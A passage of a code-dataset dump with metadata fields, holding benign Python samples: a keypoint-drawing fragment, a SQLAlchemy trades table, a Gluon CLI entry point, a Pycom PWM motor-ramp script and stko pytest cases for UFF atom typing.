os.makedirs(OUTPUT_DIR, exist_ok = True)
output_dir = None
json_kp_path = None
method_name = None
output_dir = os.path.join(OUTPUT_DIR, args.method+"/draw")
output_dir_crop = os.path.join(OUTPUT_DIR, args.method+"/crop")
os.makedirs(output_dir, exist_ok = True)
os.makedirs(output_dir_crop, exist_ok = True)
json_kp_path = args.input
method_name = args.method
for img_id in tqdm(list_imgs):
img_id = img_id
draw_keypoints_img(json_kp_path, method_name, img_id, output_dir, output_dir_crop, args.img_dir) | en | 0.264553 | @author: <NAME>, UBI @date: 2021 Parser arguments given. Enables the display of "help" funcionality @Returns: arguments parsed and stores the parameters given to the python file in appropriate variables | 2.837113 | 3 |
vpa/db/trades.py | nanvel/bittrex_vpa | 1 | 6613981 | import sqlalchemy as sa
from sqlalchemy.orm import mapper
from .base import metadata
# Raw trades table: one row per executed trade on a market.
TradesTable = sa.Table(
    'trades',
    metadata,
    sa.Column('trade_id', sa.Integer, primary_key=True),  # autoincrement
    sa.Column('market', sa.String(10)),     # market identifier string
    sa.Column('order_type', sa.String(4)),  # 'SELL' or 'BUY' (see TradeMapper)
    sa.Column('rate', sa.Float()),          # trade rate (presumably unit price -- confirm)
    sa.Column('quantity', sa.Float()),
    sa.Column('timestamp', sa.DateTime()),
    # Non-unique index to speed up time-range queries on trades.
    sa.Index('idx_timestamp', 'timestamp', unique=False)
)
class TradeMapper:
    """Row object classically mapped onto TradesTable via mapper()."""

    # Allowed values for the `order_type` column.
    ORDER_TYPE_SELL = 'SELL'
    ORDER_TYPE_BUY = 'BUY'

    def __init__(self, trade_id, market, order_type, rate, quantity, timestamp):
        """Store one trade record's column values as plain attributes."""
        self.trade_id = trade_id
        self.market = market
        self.order_type = order_type
        self.rate = rate
        self.quantity = quantity
        self.timestamp = timestamp
mapper(TradeMapper, TradesTable)
| import sqlalchemy as sa
from sqlalchemy.orm import mapper
from .base import metadata
TradesTable = sa.Table(
'trades',
metadata,
sa.Column('trade_id', sa.Integer, primary_key=True), # autoincrement
sa.Column('market', sa.String(10)),
sa.Column('order_type', sa.String(4)),
sa.Column('rate', sa.Float()),
sa.Column('quantity', sa.Float()),
sa.Column('timestamp', sa.DateTime()),
sa.Index('idx_timestamp', 'timestamp', unique=False)
)
class TradeMapper:
ORDER_TYPE_SELL = 'SELL'
ORDER_TYPE_BUY = 'BUY'
def __init__(self, trade_id, market, order_type, rate, quantity, timestamp):
self.trade_id = trade_id
self.market = market
self.order_type = order_type
self.rate = rate
self.quantity = quantity
self.timestamp = timestamp
mapper(TradeMapper, TradesTable)
| cs | 0.195343 | # autoincrement | 2.770401 | 3 |
gluon/cmd/cli.py | lfntac/ipv6 | 0 | 6613982 | # Copyright (c) 2015 Cisco Systems, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import click
import sys
import types
from oslo_config import cfg
import gluon.conf
from gluon.particleGenerator.cli import get_api_model
from gluon.particleGenerator.cli import proc_model
from gluon.particleGenerator.generator import get_model_list
CONF = cfg.CONF
sys.tracebacklimit = 0
def dummy():
    # Placeholder whose (empty) code object is harvested in main() to build
    # the top-level click group; the body must remain a bare `pass`.
    pass
def main():
    """Entry point: build and run the proton CLI from the generated models.

    NOTE(review): ``dummy.func_code`` is Python 2 syntax; Python 3 would
    need ``dummy.__code__`` -- confirm the supported interpreter version.
    """
    # Fresh empty function (detached from module globals) used as the
    # click group callback.
    cli = types.FunctionType(dummy.func_code, {})
    cli = click.group()(cli)
    model_list = get_model_list()
    model = get_api_model(sys.argv, model_list)
    # Attach sub-commands for the selected API model onto the group.
    proc_model(cli,
               package_name="gluon",
               model_dir="models",
               api_model=model,
               hostenv="OS_PROTON_HOST",
               portenv="OS_PROTON_PORT",
               hostdefault=CONF.api.host,
               portdefault=CONF.api.port)
    cli()
| # Copyright (c) 2015 Cisco Systems, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import click
import sys
import types
from oslo_config import cfg
import gluon.conf
from gluon.particleGenerator.cli import get_api_model
from gluon.particleGenerator.cli import proc_model
from gluon.particleGenerator.generator import get_model_list
CONF = cfg.CONF
sys.tracebacklimit = 0
def dummy():
pass
def main():
    """CLI entry point: build a click command group from the selected API model.

    A fresh function object is synthesised from ``dummy``'s code object so the
    click group gets a callback with a clean, empty globals namespace, then
    ``proc_model`` attaches the generated sub-commands before the group runs.
    """
    # ``__code__`` exists on Python 2.6+ and Python 3; the old ``func_code``
    # attribute used previously was removed in Python 3.
    cli = types.FunctionType(dummy.__code__, {})
    cli = click.group()(cli)
    model_list = get_model_list()
    model = get_api_model(sys.argv, model_list)
    proc_model(cli,
               package_name="gluon",
               model_dir="models",
               api_model=model,
               hostenv="OS_PROTON_HOST",
               portenv="OS_PROTON_PORT",
               hostdefault=CONF.api.host,
               portdefault=CONF.api.port)
    cli()
| en | 0.852649 | # Copyright (c) 2015 Cisco Systems, Inc. # All Rights Reserved # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. | 1.826852 | 2 |
controller/test1/test4.py | drummonds/od-robot | 0 | 6613983 | # Test4 trying to ramp rotor
from machine import Pin
import pycom
import time
from machine import PWM
# initialisation code
pycom.heartbeat(False)  # stop the default heartbeat blink so we own the LED
pycom.rgbled(0x008080)  # Start colour (teal) signals the script has booted
def speed_to_dc(speed):
    """Map a speed percentage (0-100) to a servo duty cycle.

    At the 50 Hz PWM frequency (20 ms period), the result spans a 1 ms
    pulse (5% duty) at speed 0 up to a 2 ms pulse (10% duty) at speed 100.
    """
    pulse_min = 1 / 20   # 1 ms pulse as a fraction of the 20 ms period
    pulse_span = 1 / 20  # one additional millisecond at full speed
    return (speed / 100.0) * pulse_span + pulse_min
# create pwm channel on pin P12
pwm = PWM(0, frequency=50)  # use PWM timer 0, with a frequency of 50Hz
pwm_c = pwm.channel(0, pin='P12', duty_cycle=speed_to_dc(0))  # start stopped (1 ms pulse)
# initialize `P9` in gpio mode and make it an output
p_out = Pin('P9', mode=Pin.OUT)
p_out.value(1)
p_out.value(0)
p_out.toggle()
p_out(True)
# make `P10` an input with the pull-up enabled
p_in = Pin('P10', mode=Pin.IN, pull=Pin.PULL_UP)
p_in()  # get value, 0 or 1
time.sleep(2)
# Ramp the rotor: while the input reads high, raise the speed by 10% every
# two seconds until 100%, blinking the LED green/blue as a heartbeat.
i = 0
while p_in() == 1:
    pwm_c.duty_cycle(speed_to_dc(i * 10))  # set speed to i*10 percent
    if i < 10:
        i += 1  # was `i = i++1`, which only worked by parsing as i + (+1)
    pycom.rgbled(0x008000)  # Green
    time.sleep(1)
    pycom.rgbled(0x000080)  # Blue
    time.sleep(1)
p_out.toggle()
pwm_c.duty_cycle(speed_to_dc(0))  # stop the rotor (back to the 1 ms pulse)
pycom.rgbled(0x800000)  # Red: finished
| # Test4 trying to ramp rotor
from machine import Pin
import pycom
import time
from machine import PWM
# initialisation code
pycom.heartbeat(False)  # stop the default heartbeat blink so we own the LED
pycom.rgbled(0x008080)  # Start colour (teal) signals the script has booted
def speed_to_dc(speed):
    """Map a speed percentage (0-100) to a servo duty cycle.

    At the 50 Hz PWM frequency (20 ms period), the result spans a 1 ms
    pulse (5% duty) at speed 0 up to a 2 ms pulse (10% duty) at speed 100.
    """
    pulse_min = 1 / 20   # 1 ms pulse as a fraction of the 20 ms period
    pulse_span = 1 / 20  # one additional millisecond at full speed
    return (speed / 100.0) * pulse_span + pulse_min
# create pwm channel on pin P12
pwm = PWM(0, frequency=50)  # use PWM timer 0, with a frequency of 50Hz
pwm_c = pwm.channel(0, pin='P12', duty_cycle=speed_to_dc(0))  # start stopped (1 ms pulse)
# initialize `P9` in gpio mode and make it an output
p_out = Pin('P9', mode=Pin.OUT)
p_out.value(1)
p_out.value(0)
p_out.toggle()
p_out(True)
# make `P10` an input with the pull-up enabled
p_in = Pin('P10', mode=Pin.IN, pull=Pin.PULL_UP)
p_in()  # get value, 0 or 1
time.sleep(2)
# Ramp the rotor: while the input reads high, raise the speed by 10% every
# two seconds until 100%, blinking the LED green/blue as a heartbeat.
i = 0
while p_in() == 1:
    pwm_c.duty_cycle(speed_to_dc(i * 10))  # set speed to i*10 percent
    if i < 10:
        i += 1  # was `i = i++1`, which only worked by parsing as i + (+1)
    pycom.rgbled(0x008000)  # Green
    time.sleep(1)
    pycom.rgbled(0x000080)  # Blue
    time.sleep(1)
p_out.toggle()
pwm_c.duty_cycle(speed_to_dc(0))  # stop the rotor (back to the 1 ms pulse)
pycom.rgbled(0x800000)  # Red: finished
| en | 0.688393 | # Test4 trying to ramp rotor # initialisation code # Start colour # Converts to 1 -2 ms pulses # speed in % # create pwm channel on pin P12 # use PWM timer 0, with a frequency of 50Hz # initialize `P9` in gpio mode and make it an output # make `P10` an input with the pull-up enabled # get value, 0 or 1 # change the duty cycle to 20% # Green # Blue # change the duty cycle to 20% # Red | 3.24261 | 3 |
tests/optimizers/gulp/test_uff_assign_ff.py | stevenbennett96/stko | 8 | 6613984 | import pytest
import stk
from stko import GulpUFFOptimizer, ExpectedMetal
# A Pd(2+) centre exposing four identical binding sites (one SingleAtom
# functional group per coordination position).
pd_metal = stk.BuildingBlock(
    smiles='[Pd+2]',
    functional_groups=(
        stk.SingleAtom(stk.Pd(0, charge=2))
        for i in range(4)
    ),
    position_matrix=[[0, 0, 0]],
)
# Define a bidentate ligand with two functional groups.
bidentate_ligand = stk.BuildingBlock(
    smiles='NCCN',
    functional_groups=[
        stk.SmartsFunctionalGroupFactory(
            smarts='[#7]~[#6]',
            bonders=(0, ),
            deleters=(),
        ),
    ]
)
# Construct a cis-protected square planar metal complex.
# NOTE(review): this name shadows the builtin ``complex``; harmless inside
# this test module, but worth renaming if it spreads.
complex = stk.ConstructedMolecule(
    stk.metal_complex.BidentateSquarePlanar(
        metals=pd_metal,
        ligands=bidentate_ligand,
    )
)
class CaseData:
    """
    A test case.

    Attributes
    ----------
    molecule : :class:`.Molecule`
        The molecule to be tested.

    atom_types : :class:`dict`
        Maps each atom id of `molecule` to the UFF atom-type label that
        :meth:`.GulpUFFOptimizer.assign_FF` is expected to assign.

    has_metal : :class:`bool`
        ``True`` if a metal atom is in molecule.

    metal_ff : :class:`dict` or :class:`NoneType`
        Mapping passed as ``metal_FF`` to :class:`.GulpUFFOptimizer`
        (keys appear to be atomic numbers -- confirm), or ``None``.

    """

    def __init__(self, molecule, atom_types, has_metal, metal_ff):
        self.molecule = molecule
        self.atom_types = atom_types
        self.has_metal = has_metal
        self.metal_ff = metal_ff
# Parametrised fixture: each CaseData pairs a molecule with the UFF atom
# types that GulpUFFOptimizer.assign_FF() is expected to produce for it.
@pytest.fixture(
    params=(
        # Simple alkane: all sp3 carbons.
        CaseData(
            molecule=stk.BuildingBlock('CCC'),
            atom_types={
                0: 'C_3', 1: 'C_3', 2: 'C_3',
                3: 'H_', 4: 'H_', 5: 'H_',
                6: 'H_', 7: 'H_',
                8: 'H_', 9: 'H_', 10: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock.init_from_molecule(complex),
        #     atom_types={},
        #     has_metal=True,
        #     metal_ff=None,
        # ),
        # Metal complex with an explicit metal force field supplied.
        CaseData(
            molecule=stk.BuildingBlock.init_from_molecule(complex),
            atom_types={
                0: 'Pd4+2',
                1: 'N_3', 2: 'C_3', 3: 'C_3', 4: 'N_3',
                5: 'H_', 6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_',
                10: 'H_', 11: 'H_', 12: 'H_',
                13: 'N_3', 14: 'C_3', 15: 'C_3', 16: 'N_3',
                17: 'H_', 18: 'H_', 19: 'H_', 20: 'H_', 21: 'H_',
                22: 'H_', 23: 'H_', 24: 'H_',
            },
            has_metal=True,
            metal_ff={46: 'Pd4+2'},
        ),
        # metal_ff supplied but no metal present: must be harmless.
        CaseData(
            molecule=stk.BuildingBlock('CCC'),
            atom_types={
                0: 'C_3', 1: 'C_3', 2: 'C_3',
                3: 'H_', 4: 'H_', 5: 'H_',
                6: 'H_', 7: 'H_',
                8: 'H_', 9: 'H_', 10: 'H_',
            },
            has_metal=False,
            metal_ff={26: 'Fe4+2'},
        ),
        # Benzene: aromatic (resonant) carbons.
        CaseData(
            molecule=stk.BuildingBlock('c1ccccc1'),
            atom_types={
                0: 'C_R', 1: 'C_R', 2: 'C_R',
                3: 'C_R', 4: 'C_R', 5: 'C_R',
                6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock(
        #         'CN1C=NC2=C1C(=O)N(C(=O)N2C)C'
        #     ),
        #     atom_types={
        #         0: 'C_3', 1: 'N_R', 2: 'C_R', 3: 'N_R', 4: 'C_R',
        #         5: 'C_R', 6: 'C_R', 7: 'O_2', 8: 'N_R', 9: 'C_R',
        #         10: 'O_2', 11: 'N_R', 12: 'C_3', 13: 'C_3',
        #         14: 'H_', 15: 'H_', 16: 'H_', 17: 'H_', 18: 'H_',
        #         19: 'H_', 20: 'H_', 21: 'H_', 22: 'H_', 23: 'H_',
        #     },
        #     has_metal=False,
        #     metal_ff=None,
        # ),
        # Mixed aromatic / triple-bond (C_1) carbons.
        CaseData(
            molecule=stk.BuildingBlock(
                'C1=CC(=CC(=C1)C#CC2=CN=CC=C2)C#CC3=CN=CC=C3'
            ),
            atom_types={
                0: 'C_R', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
                5: 'C_R', 6: 'C_1', 7: 'C_1', 8: 'C_R', 9: 'C_R',
                10: 'N_R', 11: 'C_R', 12: 'C_R', 13: 'C_R', 14: 'C_1',
                15: 'C_1', 16: 'C_R', 17: 'C_R', 18: 'N_R', 19: 'C_R',
                20: 'C_R', 21: 'C_R', 22: 'H_', 23: 'H_', 24: 'H_',
                25: 'H_', 26: 'H_', 27: 'H_', 28: 'H_', 29: 'H_',
                30: 'H_', 31: 'H_', 32: 'H_', 33: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock(
        #         'O=C1c2ccc(cc2Nc3cc(ccc13)C#Cc4cccnc4)C#Cc5cccnc5'
        #     ),
        #     atom_types={
        #         0: 'O_2', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
        #         5: 'C_R', 6: 'C_R', 7: 'C_R', 8: 'N_R', 9: 'C_R',
        #         10: 'C_R', 11: 'C_R', 12: 'C_R', 13: 'C_R',
        #         14: 'C_R',
        #         15: 'C_1', 16: 'C_1', 17: 'C_R', 18: 'C_R',
        #         19: 'C_R',
        #         20: 'C_R', 21: 'N_R', 22: 'C_R', 23: 'C_1',
        #         24: 'C_1',
        #         25: 'C_R', 26: 'C_R', 27: 'C_R', 28: 'C_R',
        #         29: 'N_R',
        #         30: 'C_R', 31: 'H_', 32: 'H_', 33: 'H_', 34: 'H_',
        #         35: 'H_', 36: 'H_', 37: 'H_', 38: 'H_', 39: 'H_',
        #         40: 'H_', 41: 'H_', 42: 'H_', 43: 'H_', 44: 'H_',
        #         45: 'H_',
        #     },
        #     has_metal=False,
        #     metal_ff=None,
        # ),
        # Diaminocyclohexane: sp3 ring with two amines.
        CaseData(
            molecule=stk.BuildingBlock('C1CCC(C(C1)N)N'),
            atom_types={
                0: 'C_3', 1: 'C_3', 2: 'C_3',
                3: 'C_3', 4: 'C_3', 5: 'C_3',
                6: 'N_3', 7: 'N_3',
                8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
                12: 'H_', 13: 'H_', 14: 'H_', 15: 'H_',
                16: 'H_', 17: 'H_', 18: 'H_', 19: 'H_',
                20: 'H_', 21: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock('C1=C(C=C(C=C1C=O)C=O)C=O'),
        #     atom_types={
        #         0: 'C_R', 1: 'C_R', 2: 'C_R',
        #         3: 'C_R', 4: 'C_R', 5: 'C_R',
        #         6: 'C_2', 7: 'O_2', 8: 'C_2',
        #         9: 'O_2', 10: 'C_2', 11: 'O_2',
        #         12: 'H_', 13: 'H_', 14: 'H_',
        #         15: 'H_', 16: 'H_', 17: 'H_',
        #     },
        #     has_metal=False,
        #     metal_ff=None,
        # ),
        # Acetaldehyde: sp3, sp2 carbon and carbonyl oxygen.
        CaseData(
            molecule=stk.BuildingBlock('CC=O'),
            atom_types={
                0: 'C_3', 1: 'C_2', 2: 'O_2',
                3: 'H_', 4: 'H_', 5: 'H_', 6: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
    ),
)
def test_molecule(request):
    """Yield each CaseData in turn (standard pytest parametrised fixture)."""
    return request.param
def test_assign_FF(test_molecule):
    """Check assign_FF() labels every atom with the expected UFF type.

    Molecules flagged ``has_metal`` but given no ``metal_ff`` must raise
    :class:`.ExpectedMetal` instead of silently guessing a type.
    """
    gulp_opt = GulpUFFOptimizer(
        # assign_FF never invokes the binary, so the path is unused here.
        gulp_path='not_required',
        metal_FF=test_molecule.metal_ff,
    )
    # Assign the force field.
    if test_molecule.has_metal and test_molecule.metal_ff is None:
        with pytest.raises(ExpectedMetal):
            gulp_opt.assign_FF(test_molecule.molecule)
    else:
        gulp_opt.assign_FF(test_molecule.molecule)
        assert (
            len(gulp_opt.atom_labels) == len(test_molecule.atom_types)
        )
        for aid in gulp_opt.atom_labels:
            expected_type = test_molecule.atom_types[aid]
            actual_type = gulp_opt.atom_labels[aid][0]
            # Removed the leftover debug print(aid); a failure message now
            # identifies the offending atom instead.
            assert actual_type == expected_type, (
                f'atom {aid}: expected {expected_type!r}, got {actual_type!r}'
            )
| import pytest
import stk
from stko import GulpUFFOptimizer, ExpectedMetal
# A Pd(2+) centre exposing four identical binding sites (one SingleAtom
# functional group per coordination position).
pd_metal = stk.BuildingBlock(
    smiles='[Pd+2]',
    functional_groups=(
        stk.SingleAtom(stk.Pd(0, charge=2))
        for i in range(4)
    ),
    position_matrix=[[0, 0, 0]],
)
# Define a bidentate ligand with two functional groups.
bidentate_ligand = stk.BuildingBlock(
    smiles='NCCN',
    functional_groups=[
        stk.SmartsFunctionalGroupFactory(
            smarts='[#7]~[#6]',
            bonders=(0, ),
            deleters=(),
        ),
    ]
)
# Construct a cis-protected square planar metal complex.
# NOTE(review): this name shadows the builtin ``complex``; harmless inside
# this test module, but worth renaming if it spreads.
complex = stk.ConstructedMolecule(
    stk.metal_complex.BidentateSquarePlanar(
        metals=pd_metal,
        ligands=bidentate_ligand,
    )
)
class CaseData:
    """
    A test case.

    Attributes
    ----------
    molecule : :class:`.Molecule`
        The molecule to be tested.

    atom_types : :class:`dict`
        Maps each atom id of `molecule` to the UFF atom-type label that
        :meth:`.GulpUFFOptimizer.assign_FF` is expected to assign.

    has_metal : :class:`bool`
        ``True`` if a metal atom is in molecule.

    metal_ff : :class:`dict` or :class:`NoneType`
        Mapping passed as ``metal_FF`` to :class:`.GulpUFFOptimizer`
        (keys appear to be atomic numbers -- confirm), or ``None``.

    """

    def __init__(self, molecule, atom_types, has_metal, metal_ff):
        self.molecule = molecule
        self.atom_types = atom_types
        self.has_metal = has_metal
        self.metal_ff = metal_ff
# Parametrised fixture: each CaseData pairs a molecule with the UFF atom
# types that GulpUFFOptimizer.assign_FF() is expected to produce for it.
@pytest.fixture(
    params=(
        # Simple alkane: all sp3 carbons.
        CaseData(
            molecule=stk.BuildingBlock('CCC'),
            atom_types={
                0: 'C_3', 1: 'C_3', 2: 'C_3',
                3: 'H_', 4: 'H_', 5: 'H_',
                6: 'H_', 7: 'H_',
                8: 'H_', 9: 'H_', 10: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock.init_from_molecule(complex),
        #     atom_types={},
        #     has_metal=True,
        #     metal_ff=None,
        # ),
        # Metal complex with an explicit metal force field supplied.
        CaseData(
            molecule=stk.BuildingBlock.init_from_molecule(complex),
            atom_types={
                0: 'Pd4+2',
                1: 'N_3', 2: 'C_3', 3: 'C_3', 4: 'N_3',
                5: 'H_', 6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_',
                10: 'H_', 11: 'H_', 12: 'H_',
                13: 'N_3', 14: 'C_3', 15: 'C_3', 16: 'N_3',
                17: 'H_', 18: 'H_', 19: 'H_', 20: 'H_', 21: 'H_',
                22: 'H_', 23: 'H_', 24: 'H_',
            },
            has_metal=True,
            metal_ff={46: 'Pd4+2'},
        ),
        # metal_ff supplied but no metal present: must be harmless.
        CaseData(
            molecule=stk.BuildingBlock('CCC'),
            atom_types={
                0: 'C_3', 1: 'C_3', 2: 'C_3',
                3: 'H_', 4: 'H_', 5: 'H_',
                6: 'H_', 7: 'H_',
                8: 'H_', 9: 'H_', 10: 'H_',
            },
            has_metal=False,
            metal_ff={26: 'Fe4+2'},
        ),
        # Benzene: aromatic (resonant) carbons.
        CaseData(
            molecule=stk.BuildingBlock('c1ccccc1'),
            atom_types={
                0: 'C_R', 1: 'C_R', 2: 'C_R',
                3: 'C_R', 4: 'C_R', 5: 'C_R',
                6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock(
        #         'CN1C=NC2=C1C(=O)N(C(=O)N2C)C'
        #     ),
        #     atom_types={
        #         0: 'C_3', 1: 'N_R', 2: 'C_R', 3: 'N_R', 4: 'C_R',
        #         5: 'C_R', 6: 'C_R', 7: 'O_2', 8: 'N_R', 9: 'C_R',
        #         10: 'O_2', 11: 'N_R', 12: 'C_3', 13: 'C_3',
        #         14: 'H_', 15: 'H_', 16: 'H_', 17: 'H_', 18: 'H_',
        #         19: 'H_', 20: 'H_', 21: 'H_', 22: 'H_', 23: 'H_',
        #     },
        #     has_metal=False,
        #     metal_ff=None,
        # ),
        # Mixed aromatic / triple-bond (C_1) carbons.
        CaseData(
            molecule=stk.BuildingBlock(
                'C1=CC(=CC(=C1)C#CC2=CN=CC=C2)C#CC3=CN=CC=C3'
            ),
            atom_types={
                0: 'C_R', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
                5: 'C_R', 6: 'C_1', 7: 'C_1', 8: 'C_R', 9: 'C_R',
                10: 'N_R', 11: 'C_R', 12: 'C_R', 13: 'C_R', 14: 'C_1',
                15: 'C_1', 16: 'C_R', 17: 'C_R', 18: 'N_R', 19: 'C_R',
                20: 'C_R', 21: 'C_R', 22: 'H_', 23: 'H_', 24: 'H_',
                25: 'H_', 26: 'H_', 27: 'H_', 28: 'H_', 29: 'H_',
                30: 'H_', 31: 'H_', 32: 'H_', 33: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock(
        #         'O=C1c2ccc(cc2Nc3cc(ccc13)C#Cc4cccnc4)C#Cc5cccnc5'
        #     ),
        #     atom_types={
        #         0: 'O_2', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
        #         5: 'C_R', 6: 'C_R', 7: 'C_R', 8: 'N_R', 9: 'C_R',
        #         10: 'C_R', 11: 'C_R', 12: 'C_R', 13: 'C_R',
        #         14: 'C_R',
        #         15: 'C_1', 16: 'C_1', 17: 'C_R', 18: 'C_R',
        #         19: 'C_R',
        #         20: 'C_R', 21: 'N_R', 22: 'C_R', 23: 'C_1',
        #         24: 'C_1',
        #         25: 'C_R', 26: 'C_R', 27: 'C_R', 28: 'C_R',
        #         29: 'N_R',
        #         30: 'C_R', 31: 'H_', 32: 'H_', 33: 'H_', 34: 'H_',
        #         35: 'H_', 36: 'H_', 37: 'H_', 38: 'H_', 39: 'H_',
        #         40: 'H_', 41: 'H_', 42: 'H_', 43: 'H_', 44: 'H_',
        #         45: 'H_',
        #     },
        #     has_metal=False,
        #     metal_ff=None,
        # ),
        # Diaminocyclohexane: sp3 ring with two amines.
        CaseData(
            molecule=stk.BuildingBlock('C1CCC(C(C1)N)N'),
            atom_types={
                0: 'C_3', 1: 'C_3', 2: 'C_3',
                3: 'C_3', 4: 'C_3', 5: 'C_3',
                6: 'N_3', 7: 'N_3',
                8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
                12: 'H_', 13: 'H_', 14: 'H_', 15: 'H_',
                16: 'H_', 17: 'H_', 18: 'H_', 19: 'H_',
                20: 'H_', 21: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
        # CaseData(
        #     molecule=stk.BuildingBlock('C1=C(C=C(C=C1C=O)C=O)C=O'),
        #     atom_types={
        #         0: 'C_R', 1: 'C_R', 2: 'C_R',
        #         3: 'C_R', 4: 'C_R', 5: 'C_R',
        #         6: 'C_2', 7: 'O_2', 8: 'C_2',
        #         9: 'O_2', 10: 'C_2', 11: 'O_2',
        #         12: 'H_', 13: 'H_', 14: 'H_',
        #         15: 'H_', 16: 'H_', 17: 'H_',
        #     },
        #     has_metal=False,
        #     metal_ff=None,
        # ),
        # Acetaldehyde: sp3, sp2 carbon and carbonyl oxygen.
        CaseData(
            molecule=stk.BuildingBlock('CC=O'),
            atom_types={
                0: 'C_3', 1: 'C_2', 2: 'O_2',
                3: 'H_', 4: 'H_', 5: 'H_', 6: 'H_',
            },
            has_metal=False,
            metal_ff=None,
        ),
    ),
)
def test_molecule(request):
    """Yield each CaseData in turn (standard pytest parametrised fixture)."""
    return request.param
def test_assign_FF(test_molecule):
    """Check assign_FF() labels every atom with the expected UFF type.

    Molecules flagged ``has_metal`` but given no ``metal_ff`` must raise
    :class:`.ExpectedMetal` instead of silently guessing a type.
    """
    gulp_opt = GulpUFFOptimizer(
        # assign_FF never invokes the binary, so the path is unused here.
        gulp_path='not_required',
        metal_FF=test_molecule.metal_ff,
    )
    # Assign the force field.
    if test_molecule.has_metal and test_molecule.metal_ff is None:
        with pytest.raises(ExpectedMetal):
            gulp_opt.assign_FF(test_molecule.molecule)
    else:
        gulp_opt.assign_FF(test_molecule.molecule)
        assert (
            len(gulp_opt.atom_labels) == len(test_molecule.atom_types)
        )
        for aid in gulp_opt.atom_labels:
            expected_type = test_molecule.atom_types[aid]
            actual_type = gulp_opt.atom_labels[aid][0]
            # Removed the leftover debug print(aid); a failure message now
            # identifies the offending atom instead.
            assert actual_type == expected_type, (
                f'atom {aid}: expected {expected_type!r}, got {actual_type!r}'
            )
| en | 0.286879 | # Define a bidentate ligand with two functional groups. #7]~[#6]', # Construct a cis-protected square planar metal complex. A test case. Attributes ---------- molecule : :class:`.Molecule` The molecule to be tested. atom_types : :class:`dict` The smiles for the molecule. has_metal : :class:`bool` ``True`` if a metal atom is in molecule. metal_ff : :class:`dict` or :class:`NoneType` The position matrix of the molecule. # CaseData( # molecule=stk.BuildingBlock.init_from_molecule(complex), # atom_types={}, # has_metal=True, # metal_ff=None, # ), # CaseData( # molecule=stk.BuildingBlock( # 'CN1C=NC2=C1C(=O)N(C(=O)N2C)C' # ), # atom_types={ # 0: 'C_3', 1: 'N_R', 2: 'C_R', 3: 'N_R', 4: 'C_R', # 5: 'C_R', 6: 'C_R', 7: 'O_2', 8: 'N_R', 9: 'C_R', # 10: 'O_2', 11: 'N_R', 12: 'C_3', 13: 'C_3', # 14: 'H_', 15: 'H_', 16: 'H_', 17: 'H_', 18: 'H_', # 19: 'H_', 20: 'H_', 21: 'H_', 22: 'H_', 23: 'H_', # }, # has_metal=False, # metal_ff=None, # ), #CC2=CN=CC=C2)C#CC3=CN=CC=C3' # CaseData( # molecule=stk.BuildingBlock( # 'O=C1c2ccc(cc2Nc3cc(ccc13)C#Cc4cccnc4)C#Cc5cccnc5' # ), # atom_types={ # 0: 'O_2', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R', # 5: 'C_R', 6: 'C_R', 7: 'C_R', 8: 'N_R', 9: 'C_R', # 10: 'C_R', 11: 'C_R', 12: 'C_R', 13: 'C_R', # 14: 'C_R', # 15: 'C_1', 16: 'C_1', 17: 'C_R', 18: 'C_R', # 19: 'C_R', # 20: 'C_R', 21: 'N_R', 22: 'C_R', 23: 'C_1', # 24: 'C_1', # 25: 'C_R', 26: 'C_R', 27: 'C_R', 28: 'C_R', # 29: 'N_R', # 30: 'C_R', 31: 'H_', 32: 'H_', 33: 'H_', 34: 'H_', # 35: 'H_', 36: 'H_', 37: 'H_', 38: 'H_', 39: 'H_', # 40: 'H_', 41: 'H_', 42: 'H_', 43: 'H_', 44: 'H_', # 45: 'H_', # }, # has_metal=False, # metal_ff=None, # ), # CaseData( # molecule=stk.BuildingBlock('C1=C(C=C(C=C1C=O)C=O)C=O'), # atom_types={ # 0: 'C_R', 1: 'C_R', 2: 'C_R', # 3: 'C_R', 4: 'C_R', 5: 'C_R', # 6: 'C_2', 7: 'O_2', 